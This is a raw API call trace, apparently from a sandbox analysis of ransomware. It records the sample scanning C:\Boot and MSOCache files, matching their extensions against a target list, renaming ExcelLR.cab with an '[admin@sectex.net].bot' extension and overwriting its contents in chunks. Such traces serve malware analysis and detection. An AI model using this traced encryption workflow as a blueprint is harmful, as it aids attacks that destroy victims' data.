	[0033.272] lstrlenW (lpString=".zip") returned 4
	[0033.272] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.272] lstrlenW (lpString=".rar") returned 4
	[0033.272] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.273] lstrlenW (lpString=".bz2") returned 4
	[0033.273] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.273] lstrlenW (lpString=".7z") returned 3
	[0033.273] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.273] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.273] lstrlenW (lpString=".dbf") returned 4
	[0033.273] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.273] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.273] lstrlenW (lpString=".1cd") returned 4
	[0033.273] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.273] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.273] lstrlenW (lpString=".jpg") returned 4
	[0033.273] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.273] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.273] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.273] lstrlenW (lpString=".doc") returned 4
	[0033.273] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.273] lstrlenW (lpString=".docx") returned 5
	[0033.273] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.273] lstrlenW (lpString=".pdf") returned 4
	[0033.273] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.273] lstrlenW (lpString=".xls") returned 4
	[0033.273] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.273] lstrlenW (lpString=".xlsx") returned 5
	[0033.273] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.273] lstrlenW (lpString=".ppt") returned 4
	[0033.273] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.273] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.273] lstrlenW (lpString=".zip") returned 4
	[0033.273] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.273] lstrlenW (lpString=".rar") returned 4
	[0033.273] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.273] lstrlenW (lpString=".bz2") returned 4
	[0033.273] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.274] lstrlenW (lpString=".7z") returned 3
	[0033.274] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.274] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.274] lstrlenW (lpString=".dbf") returned 4
	[0033.274] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.274] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.274] lstrlenW (lpString=".1cd") returned 4
	[0033.274] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.274] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.274] lstrlenW (lpString=".jpg") returned 4
	[0033.274] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.274] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0033.274] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0033.274] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.274] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=90704) returned 1
	[0033.274] CloseHandle (hObject=0x190) returned 1
	[0033.274] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20
	[0033.274] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.274] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0033.275] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.275] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.275] lstrlenW (lpString=".doc") returned 4
	[0033.275] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.275] lstrlenW (lpString=".docx") returned 5
	[0033.275] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.275] lstrlenW (lpString=".pdf") returned 4
	[0033.275] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.275] lstrlenW (lpString=".xls") returned 4
	[0033.275] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.275] lstrlenW (lpString=".xlsx") returned 5
	[0033.275] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.275] lstrlenW (lpString=".ppt") returned 4
	[0033.275] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.275] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.275] lstrlenW (lpString=".zip") returned 4
	[0033.275] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.275] lstrlenW (lpString=".rar") returned 4
	[0033.275] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.275] lstrlenW (lpString=".bz2") returned 4
	[0033.275] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.275] lstrlenW (lpString=".7z") returned 3
	[0033.275] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.275] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.275] lstrlenW (lpString=".dbf") returned 4
	[0033.275] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.275] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.275] lstrlenW (lpString=".1cd") returned 4
	[0033.275] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.275] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.275] lstrlenW (lpString=".jpg") returned 4
	[0033.275] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.275] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.275] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.276] lstrlenW (lpString=".doc") returned 4
	[0033.276] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.276] lstrlenW (lpString=".docx") returned 5
	[0033.276] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.276] lstrlenW (lpString=".pdf") returned 4
	[0033.276] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.276] lstrlenW (lpString=".xls") returned 4
	[0033.276] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.276] lstrlenW (lpString=".xlsx") returned 5
	[0033.276] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.276] lstrlenW (lpString=".ppt") returned 4
	[0033.276] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.276] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.276] lstrlenW (lpString=".zip") returned 4
	[0033.276] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.276] lstrlenW (lpString=".rar") returned 4
	[0033.276] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.276] lstrlenW (lpString=".bz2") returned 4
	[0033.276] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.276] lstrlenW (lpString=".7z") returned 3
	[0033.276] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.276] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.276] lstrlenW (lpString=".dbf") returned 4
	[0033.276] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.276] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.276] lstrlenW (lpString=".1cd") returned 4
	[0033.276] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.276] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29
	[0033.276] lstrlenW (lpString=".jpg") returned 4
	[0033.276] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.276] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0033.277] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0033.277] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.277] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=76352) returned 1
	[0033.277] CloseHandle (hObject=0x190) returned 1
	[0033.277] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20
	[0033.277] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.277] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0033.277] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.277] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.277] lstrlenW (lpString=".doc") returned 4
	[0033.277] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.277] lstrlenW (lpString=".docx") returned 5
	[0033.277] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.277] lstrlenW (lpString=".pdf") returned 4
	[0033.277] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.277] lstrlenW (lpString=".xls") returned 4
	[0033.277] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.277] lstrlenW (lpString=".xlsx") returned 5
	[0033.277] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.277] lstrlenW (lpString=".ppt") returned 4
	[0033.277] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.277] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.277] lstrlenW (lpString=".zip") returned 4
	[0033.278] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.278] lstrlenW (lpString=".rar") returned 4
	[0033.278] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.278] lstrlenW (lpString=".bz2") returned 4
	[0033.278] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.278] lstrlenW (lpString=".7z") returned 3
	[0033.278] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.278] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.278] lstrlenW (lpString=".dbf") returned 4
	[0033.278] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.278] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.278] lstrlenW (lpString=".1cd") returned 4
	[0033.278] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.278] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.278] lstrlenW (lpString=".jpg") returned 4
	[0033.278] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.278] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.278] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.278] lstrlenW (lpString=".doc") returned 4
	[0033.278] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.278] lstrlenW (lpString=".docx") returned 5
	[0033.278] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.278] lstrlenW (lpString=".pdf") returned 4
	[0033.278] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.278] lstrlenW (lpString=".xls") returned 4
	[0033.278] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.278] lstrlenW (lpString=".xlsx") returned 5
	[0033.278] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.278] lstrlenW (lpString=".ppt") returned 4
	[0033.278] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.278] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.278] lstrlenW (lpString=".zip") returned 4
	[0033.278] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.278] lstrlenW (lpString=".rar") returned 4
	[0033.279] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.279] lstrlenW (lpString=".bz2") returned 4
	[0033.279] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.279] lstrlenW (lpString=".7z") returned 3
	[0033.279] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.279] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.279] lstrlenW (lpString=".dbf") returned 4
	[0033.279] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.279] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.279] lstrlenW (lpString=".1cd") returned 4
	[0033.279] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.279] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29
	[0033.279] lstrlenW (lpString=".jpg") returned 4
	[0033.279] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.279] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0033.279] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0033.279] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.279] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=75344) returned 1
	[0033.279] CloseHandle (hObject=0x190) returned 1
	[0033.279] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20
	[0033.279] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.280] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0033.280] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0033.280] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0033.280] lstrlenW (lpString=".doc") returned 4
	[0033.280] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.280] lstrlenW (lpString=".docx") returned 5
	[0033.280] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.280] lstrlenW (lpString=".pdf") returned 4
	[0033.280] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.280] lstrlenW (lpString=".xls") returned 4
	[0033.280] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.280] lstrlenW (lpString=".xlsx") returned 5
	[0033.280] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.280] lstrlenW (lpString=".ppt") returned 4
	[0033.280] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.280] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29
	[0033.280] lstrlenW (lpString=".zip") returned 4
	[0033.280] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.280] lstrlenW (lpString=".rar") returned 4
	[0033.280] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.280] lstrlenW (lpString=".bz2") returned 4
	[0033.280] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.280] lstrlenW (lpString=".7z") returned 3
	[0033.280] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0035.122] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=16972987) returned 1
	[0035.122] CloseHandle (hObject=0x1a4) returned 1
	[0035.123] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab")) returned 0x2020
	[0035.123] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.123] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0035.123] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4
	[0035.123] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0035.124] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0035.124] ReadFile (in: hFile=0x1a4, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0035.132] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0035.132] ReadFile (in: hFile=0x1a4, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0035.139] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0035.139] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0035.139] ReadFile (in: hFile=0x1a4, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0035.160] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.160] WriteFile (in: hFile=0x1a4, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0035.469] SetEndOfFile (hFile=0x1a4) returned 1
	[0035.470] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4ab738
	[0035.473] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.474] WriteFile (in: hFile=0x1a4, lpBuffer=0xb4ab738*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4ab738*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.474] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.474] WriteFile (in: hFile=0x1a4, lpBuffer=0xb4ab738*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4ab738*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.475] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.475] WriteFile (in: hFile=0x1a4, lpBuffer=0xb4ab738*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4ab738*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.477] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4ab738 | out: hHeap=0x7d60000) returned 1
	[0035.479] CloseHandle (hObject=0x1a4) returned 1
	[0039.186] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0039.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.187] lstrlenW (lpString=".doc") returned 4
	[0039.187] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0039.187] lstrlenW (lpString=".docx") returned 5
	[0039.187] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0039.187] lstrlenW (lpString=".pdf") returned 4
	[0039.187] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0039.187] lstrlenW (lpString=".xls") returned 4
	[0039.187] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0039.187] lstrlenW (lpString=".xlsx") returned 5
	[0039.187] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0039.187] lstrlenW (lpString=".ppt") returned 4
	[0039.187] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0039.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.187] lstrlenW (lpString=".zip") returned 4
	[0039.187] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0039.187] lstrlenW (lpString=".rar") returned 4
	[0039.187] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0039.187] lstrlenW (lpString=".bz2") returned 4
	[0039.187] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0039.187] lstrlenW (lpString=".7z") returned 3
	[0039.187] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0039.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.187] lstrlenW (lpString=".dbf") returned 4
	[0039.187] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0039.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.187] lstrlenW (lpString=".1cd") returned 4
	[0039.187] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0039.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.187] lstrlenW (lpString=".jpg") returned 4
	[0039.187] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0039.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.188] lstrlenW (lpString=".doc") returned 4
	[0039.188] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0039.188] lstrlenW (lpString=".docx") returned 5
	[0039.188] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0039.188] lstrlenW (lpString=".pdf") returned 4
	[0039.188] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0039.188] lstrlenW (lpString=".xls") returned 4
	[0039.188] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0039.188] lstrlenW (lpString=".xlsx") returned 5
	[0039.188] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0039.188] lstrlenW (lpString=".ppt") returned 4
	[0039.188] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0039.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.188] lstrlenW (lpString=".zip") returned 4
	[0039.188] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0039.188] lstrlenW (lpString=".rar") returned 4
	[0039.188] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0039.188] lstrlenW (lpString=".bz2") returned 4
